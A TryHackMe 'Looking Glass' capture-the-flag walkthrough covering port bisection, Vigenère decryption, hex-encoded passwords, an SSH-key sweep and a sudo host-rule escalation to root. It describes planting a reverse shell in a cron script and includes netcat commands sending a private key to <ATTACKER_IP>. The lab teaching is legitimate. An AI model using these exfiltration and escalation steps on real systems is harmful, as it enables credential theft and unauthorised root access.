TryHackMe: Looking Glass
Introduction
Looking Glass is rated as a medium-difficulty CTF-style machine created by NinjaJc01, and it is the sister room to "Wonderland", which can also be found on TryHackMe (a writeup for that room can also be found on this blog).
Much like Alice in the worlds of Lewis Carroll, the pentester who strives to learn about their environment will have the most productive journey Through the Looking Glass!
The challenge link can be found here: tryhackme.com/room/lookingglass
NOTE: The challenge link for the previous room, Wonderland, can be found here: tryhackme.com/room/wonderland
Enumeration
My initial nmap scan showed 84 open ports, most of them reporting the Dropbear SSH service. At the same time I had an all-ports scan running that never fully finished. The point is that there are a lot of open ports to start with here.
I did also see an OpenSSH service on the default port 22, but everything else appeared to be a clone of this Dropbear SSH server.

After a while I started trying to connect to those open ports with ssh, specifying each port with -p. Most of them would reply with one string, either "Higher" or "Lower", and then promptly disconnect.
After trying the extremes of the port range I figured it was telling me that the port I had picked was either too high or too low.
So, recalling my analog electronics troubleshooting methodology: divide and conquer! Whatever the range is, cut it in half, probe the midpoint, and keep the half the reply points to. Each probe halves the remaining range, so even a few thousand candidate ports take only a dozen or so connections.
I had thought about scripting this out for the extra practice, but I narrowed it down to just a few ports within a minute or so by hand.
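For anyone who does want the scripted version, here is one as an added example in Python (not code from the original writeup). It binary-searches the port range using the Higher/Lower replies as the oracle. Assumptions: "Higher" means the real port is above the one probed and "Lower" below (inferred from the behaviour described above); the target and range come from the command line; the offline stand-in oracle, its port 11111 and the demo range 9000-13999 are constructed for this example and are not the room's values.

```python
import socket
import sys


def banner(host, port, timeout=5.0):
    """Return the first line a service sends on connect, or None if nothing answered.

    The decoy services send their one-word hint immediately and hang up; a real
    SSH daemon would answer with its "SSH-2.0-..." version string instead, so
    keep the search range to the decoy ports nmap reported.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            data = sock.recv(1024)
    except OSError:
        return None
    return data.split(b"\n", 1)[0].decode("ascii", "replace").strip()


def bisect_port(oracle, low, high):
    """Binary-search ports low..high for the one whose reply is neither hint.

    oracle(port) -> first banner line (str), or None/"" when nothing answered.
    Assumed convention: "Higher" = real port is above `port`, "Lower" = below.
    Returns (port, reply, probes); port is None if the range held no such port.
    """
    probes = 0
    while low <= high:
        mid = (low + high) // 2
        reply = oracle(mid)
        probes += 1
        if not reply:
            raise RuntimeError(f"port {mid} gave no banner; is the range right?")
        if reply == "Higher":
            low = mid + 1
        elif reply == "Lower":
            high = mid - 1
        else:
            return mid, reply, probes
    return None, None, probes


def fake_oracle(port, real=11111):
    """Constructed offline stand-in for the box: pretends the real service is on 11111."""
    if port < real:
        return "Higher"
    if port > real:
        return "Lower"
    return "(constructed) the real service's cipher message would start here"


if __name__ == "__main__":
    if len(sys.argv) == 4:  # usage: script.py TARGET LOW HIGH
        host, lo, hi = sys.argv[1], int(sys.argv[2]), int(sys.argv[3])
        port, reply, n = bisect_port(lambda p: banner(host, p), lo, hi)
    else:                   # no target given: run against the constructed stand-in
        port, reply, n = bisect_port(fake_oracle, 9000, 13999)
    print(f"found port {port} after {n} probes: {reply}")
```

Because the active port moves on every reboot, the search has to be repeated after the reboot used later in this writeup; with a range of a few thousand ports the script needs only around a dozen connections each time.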

NOTE: You can try the same range on your own, but the port I found likely won't work for you: the active port changes with each reboot.
Anyway, once you've found the active port you get a nicely enciphered message from the Jabberwocky asking you for a secret.

Initial Compromise
It seemed like it might be a ROT13 or Caesar cipher, but trying as many shift combinations as possible in CyberChef didn't yield any results. I tried googling for the Jabberwocky hoping for some kind of clue, and I did find a cleartext version of the poem. Interestingly enough, the ciphertext and cleartext match up in word count and punctuation, but the ciphertext has an extra line at the end. So it looked like I was trying to decrypt the ciphertext back into the cleartext poem, with an extra line added on.
The next place I took this was dcode.fr, which has an excellent cipher identifier. The top two suggestions were a Chaocipher and a Vigenère cipher. The Chaocipher seemed like a dead end and I didn't have a key for the Vigenère cipher (I tried alice, jabberwock, lewis, carroll, words from the poem, etc.), so no luck there.
So I did some googling for 'how to solve vigenere cipher without key', which led me to the following site with a wickedly fast turnaround: planetcalc.com/7956. Note that with the plaintext known, no key guessing is needed at all: for a Vigenère cipher, subtracting each plaintext letter from the matching ciphertext letter mod 26 gives the keystream directly, and the key is its shortest repeating unit; that key then decrypts the extra line too.
We're able to extract the secret, and when we enter it into the active Dropbear port we get what looks like credentials for a user named jabberwock.
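The known-plaintext recovery just described, worked through as an added example in Python (not the original writeup's method; the author used planetcalc). The key MIRROR, the trailing secret line and therefore the sample ciphertext are constructed for this example and are not the room's values; the first two lines of Jabberwocky serve as the known plaintext.

```python
import string

ALPHA = string.ascii_uppercase


def _shift(ch, k, sign):
    """Shift one letter by k positions, preserving case; non-letters pass through."""
    if ch.isalpha():
        base = ord("A") if ch.isupper() else ord("a")
        return chr((ord(ch) - base + sign * k) % 26 + base)
    return ch


def vigenere(text, key, decrypt=False):
    """Classic Vigenère: the key index advances only on letters."""
    out, i = [], 0
    for ch in text:
        if ch.isalpha():
            k = ALPHA.index(key[i % len(key)].upper())
            out.append(_shift(ch, k, -1 if decrypt else 1))
            i += 1
        else:
            out.append(ch)
    return "".join(out)


def keystream(ciphertext, known_plaintext):
    """Known-plaintext attack: key letter = (C - P) mod 26, over letters only."""
    c = [ch.upper() for ch in ciphertext if ch.isalpha()]
    p = [ch.upper() for ch in known_plaintext if ch.isalpha()]
    return "".join(ALPHA[(ord(a) - ord(b)) % 26] for a, b in zip(c, p))


def shortest_period(stream):
    """Smallest p such that the stream is a repetition of its first p letters.

    If the known plaintext is shorter than two key lengths the answer is
    ambiguous (a key of 7 letters with only 5 known looks like a 5-letter key).
    """
    for p in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % p] for i in range(len(stream))):
            return p
    return len(stream)


def recover_key(ciphertext, known_plaintext):
    ks = keystream(ciphertext, known_plaintext)
    return ks[:shortest_period(ks)]


# Constructed sample: known poem text plus a secret line, enciphered under a made-up key.
KEY = "MIRROR"  # constructed; not the room's key
KNOWN = "'Twas brillig, and the slithy toves\nDid gyre and gimble in the wabe:"
EXTRA = "\nthe secret is open sesame"  # constructed trailing line
CIPHERTEXT = vigenere(KNOWN + EXTRA, KEY)


def solve(ciphertext=CIPHERTEXT, known=KNOWN):
    """Recover the key from the known lines, then decrypt everything including the extra line."""
    key = recover_key(ciphertext, known)
    return key, vigenere(ciphertext, key, decrypt=True)


if __name__ == "__main__":
    key, plain = solve()
    print("recovered key:", key)
    print(plain)
```

With the real ciphertext you would paste the room's text in place of CIPHERTEXT and the poem's cleartext in place of KNOWN; the extra line at the end is exactly the part the known plaintext does not cover, which is why the key has to be recovered first.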

Lateral Movement
Now that we're logged in as the user jabberwock, I start the usual enumeration. We see that jabberwock is able to reboot the machine as root.

Additionally, after uploading the linux-smart-enumeration script, we see a cron job, triggered at reboot and owned by tweedledum, that runs a script located in jabberwock's home directory.

Since it's just a bash script sitting in our own home directory, we can echo a bash reverse shell into it, start a listener on our attacking machine, and then reboot the box to catch a shell as tweedledum.

Cool, now we're in as tweedledum. More enumeration ensues with the aid of the linux-smart-enumeration script (lse for short).

Interestingly enough, tweedledum is able to run /bin/bash as tweedledee without supplying a password. It looks like a lateral move rather than an escalation, but let's try it out and see if we find anything new.
NOTE: The -u switch tells sudo which user to run the command as, i.e. sudo -u <username> <command>; in this case: sudo -u tweedledee /bin/bash

After making the user switch we see that tweedledee and tweedledum have the same sudo capabilities to switch between each other, and they have almost exactly the same files in their home directories (which makes sense considering they were identical twins in the storybook). Speaking of files, the humptydumpty.txt file in each of their directories looks like it has a list of hashes in it.


Before going all in I try plugging them into CrackStation to see if we get any quick hits. Looks like a pretty good clue...

I tried cracking them with hashcat but went through the entirety of rockyou without finding anything fruitful.

Next stop was the cipher identifier at dcode.fr, just to get an idea of what else this could be.
dcode.fr/cipher-identifier
The top suggestion was ASCII code, and after entering the "hash" into the ASCII calculator it flagged the string as hex and decoded it into a password for me. That is the tell: a real digest is hex too, but its bytes decode to random garbage, whereas this one decoded to printable text.
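The same triage, as an added Python example (not the writeup's own tooling): for each hex-looking token, decide whether it decodes to printable ASCII (hex-encoded text, as in humptydumpty.txt) or is a digest-length string of random bytes worth sending to hashcat. The sample file contents are constructed: md5("hello") stands in for a genuine hash, and the second entry is a made-up password hex-encoded by the script itself.

```python
import re
import string

# Digest lengths in hex characters; a hex string of another length is unlikely to be a hash.
HASH_LENGTHS = {32: "md5", 40: "sha1", 64: "sha256", 128: "sha512"}
HEX_RE = re.compile(r"^[0-9a-fA-F]+$")


def classify(token):
    """Classify one token.

    Returns ("hex-ascii", decoded_text) when the hex decodes to printable text,
    ("hash?", algorithm_guess) when it is hex that decodes to non-printable bytes,
    and ("other", None) when it is not even-length hex.
    """
    if not HEX_RE.match(token) or len(token) % 2:
        return "other", None
    text = bytes.fromhex(token).decode("ascii", "replace")  # non-ASCII -> U+FFFD
    if all(ch in string.printable for ch in text):
        return "hex-ascii", text
    return "hash?", HASH_LENGTHS.get(len(token), "unknown-length")


def scan(lines):
    """Classify every non-empty line of a humptydumpty.txt-style file."""
    return [(tok, *classify(tok)) for tok in (ln.strip() for ln in lines) if tok]


# Constructed stand-in for humptydumpty.txt: one genuine-looking digest, one hex-encoded password.
SAMPLE = "\n".join([
    "5d41402abc4b2a76b9719d911017c592",              # md5("hello")
    "this-is-a-constructed-password".encode().hex(),  # what the real file's entry looked like
])

if __name__ == "__main__":
    for token, kind, detail in scan(SAMPLE.splitlines()):
        print(f"{token[:16]}...  {kind:10} {detail!r}")
```

Genuine digests fail the printable test with overwhelming probability (16 random bytes all landing in the printable range happens about once in three million), so a "hash" that passes it is worth reading before it is worth cracking.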

We can now switch users to humptydumpty thanks to this password. In humptydumpty's home directory we find another poem. No clues for escalation, but it does advance the story somewhat.

I run the lse script again and notice something interesting for the alice user. Running /bin/bash as root sounds wonderful... now how do we become alice?

Privilege Escalation
Checking out the /home directory, I notice that alice's home directory has the execute bit set for all users. No read or write, but we can execute, i.e. traverse, in there.
Because the directory is traversable but not listable, ls fails, yet anything reached by an exact path still works. So we can change directories into /home/alice and take a chance on enumerating /home/alice/.ssh by guessing the default path and filename, and we are rewarded with a private SSH key.
To pull it back, we set a netcat listener on our attacking machine and then direct the id_rsa file into a netcat connection pointed at that listener.
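The sweep behind that guess, as an added Python example (not the writeup's own code): walk /home, flag directories that others may enter but not list (mode 711 and friends), and probe each for well-known files by exact path. The candidate list and the fixture built by demo() (a user "alice" with a readable id_rsa) are constructed for this example; the exfiltration commands in the comment mirror the netcat step described above.

```python
import os
import stat

# Files worth trying by exact path inside a directory we can enter but not list.
# Constructed list for this example; extend it with whatever the engagement suggests.
CANDIDATES = [
    ".ssh/id_rsa", ".ssh/id_ed25519", ".ssh/authorized_keys",
    ".bash_history", ".git-credentials",
]


def traversable_not_listable(path):
    """True when 'other' has execute but not read on a directory (e.g. mode 711).

    Only the 'other' bits are checked; if you share a group with the owner the
    group bits matter too, so treat this as a first pass, not a proof.
    """
    mode = os.stat(path).st_mode
    return stat.S_ISDIR(mode) and bool(mode & stat.S_IXOTH) and not (mode & stat.S_IROTH)


def probe_home(home, candidates=CANDIDATES):
    """Return the candidate files under `home` that exist and that we can read."""
    found = []
    for rel in candidates:
        p = os.path.join(home, rel)
        if os.path.isfile(p) and os.access(p, os.R_OK):
            found.append(p)
    return found


def sweep(home_root="/home"):
    """Map each enterable-but-unlistable home directory to the loot readable inside it."""
    results = {}
    for name in sorted(os.listdir(home_root)):
        d = os.path.join(home_root, name)
        try:
            if traversable_not_listable(d):
                results[d] = probe_home(d)
        except OSError:
            continue
    return results
    # Exfil once a key is found (the netcat step from the writeup):
    #   attacker:  nc -lvnp 4444 > id_rsa
    #   target:    nc <ATTACKER_IP> 4444 < /home/alice/.ssh/id_rsa
    #   attacker:  chmod 400 id_rsa && ssh -i id_rsa alice@<TARGET>


def demo():
    """Constructed fixture: a mode-711 home with a world-readable key, swept and cleaned up."""
    import shutil
    import tempfile
    root = tempfile.mkdtemp()
    home = os.path.join(root, "alice")
    os.makedirs(os.path.join(home, ".ssh"))
    key = os.path.join(home, ".ssh", "id_rsa")
    with open(key, "w") as f:
        f.write("-----BEGIN OPENSSH PRIVATE KEY-----\n(constructed)\n")
    os.chmod(key, 0o644)
    os.chmod(os.path.join(home, ".ssh"), 0o711)
    os.chmod(home, 0o711)
    result = {os.path.relpath(d, root): [os.path.relpath(p, root) for p in loot]
              for d, loot in sweep(root).items()}
    shutil.rmtree(root)
    return result


if __name__ == "__main__":
    print(demo())
    for d, loot in sweep().items():
        print(d, loot)
```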

After this we should be able to ssh in as alice using the exfiltrated private key. Whoops! I forgot to set permissions on the private key (which I renamed to 'alice'): chmod 400 alice
Or, if you kept the default name: chmod 400 id_rsa
ssh refuses to use a private key that is readable by group or world ("UNPROTECTED PRIVATE KEY FILE"), so this step is mandatory, not cosmetic.

Once we're in as alice I see another poem in the user's home directory, but it doesn't seem too useful, so it's time to take a look at that interesting sudo entry for alice again.

We can't read /etc/sudoers directly, but we can read the /etc/sudoers.d drop-in directory that stores settings for several of the users on this machine.
This entry is basically saying "the user alice, on the host ssalg-gnikool, can run /bin/bash as root without a password". The general form of a sudoers rule is: <USER> <HOST> = <Runas_Spec> <Tag_Spec>: <Command>
NOTE: This link is a bit dense but thorough: sudo.ws/man/1.7.10/sudoers.man.html

With the following command we're basically saying "alice would like to run /bin/bash as root on the host ssalg-gnikool": sudo -h ssalg-gnikool /bin/bash
Because ssalg-gnikool is not this machine's hostname (it's "looking-glass" spelled backwards), sudo warns that it can't resolve the host. But sudoers matches the rule's host field against the host named with -h rather than the local hostname, and since the sudoers plugin has no way to run commands on a remote host, it simply runs /bin/bash as root right here.
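From the defender's side, the lesson is that a rule bound to some other host is still reachable on this one. The following is an added Python example (not from the writeup) that audits a sudoers file for rules whose host field is neither ALL nor the local hostname; anyone named in such a rule can invoke it locally with sudo -h <that-host>. The sample sudoers text, the user bob and the host webserver are constructed for this example; the alice line reproduces the rule described above.

```python
import re
import socket

# Lines that are not user specifications: comments, includes, Defaults, alias definitions.
SKIP = re.compile(r"^(#|@|$|Defaults|(?:User|Runas|Host|Cmnd)_Alias)")


def host_bound_rules(sudoers_text, local_host=None):
    """Yield (user, host, rest) for rules whose host field is neither ALL nor this host.

    Such rules look inert here, but `sudo -h <host>` makes sudoers evaluate the
    rule against the host you name, and because the sudoers plugin cannot run
    commands remotely the command executes on the local machine.
    Backslash line continuations are not handled; join them first if present.
    """
    local_host = local_host or socket.gethostname()
    for raw in sudoers_text.splitlines():
        line = raw.strip()
        if SKIP.match(line) or "=" not in line:
            continue
        lhs, rhs = line.split("=", 1)
        parts = lhs.split()
        if len(parts) < 2:
            continue
        user, host = parts[0], parts[1]
        if host.upper() != "ALL" and host != local_host:
            yield user, host, rhs.strip()


# Constructed sample; not the box's real file.
SAMPLE = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
alice ssalg-gnikool = NOPASSWD: /bin/bash
bob     webserver = (www-data) /usr/bin/systemctl restart nginx
"""


def audit(text=SAMPLE, local_host="looking-glass"):
    return list(host_bound_rules(text, local_host))


if __name__ == "__main__":
    for user, host, rest in audit():
        print(f"{user} may run `sudo -h {host} ...` here: {rest}")
```

In practice you would feed it the concatenation of /etc/sudoers and /etc/sudoers.d/* and review every hit: either the rule is meant for this box (then bind it to the real hostname or ALL) or it is not (then it should not be present in this machine's sudoers at all).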

That's it! After we've got root we can loot the remaining flag and even check out the scripts and programs that were randomizing the jabberwock password after each reboot and changing the active Dropbear port on us (sneaky, sneaky... and very nice!).
Conclusion
This was a really fun box to get lost in for a little while! Most of the lateral movements came down to exploring what each user had available to them in terms of capabilities or resources, and the final escalation to root was pretty nifty too. We don't often see host-qualified sudo rules in these CTF-style boxes, and I had never seen this one before, so it was a nice curveball and a good reminder of a real-world scenario we should all be aware of: a sudoers file shared across a fleet can grant rights on this host that were only meant for another.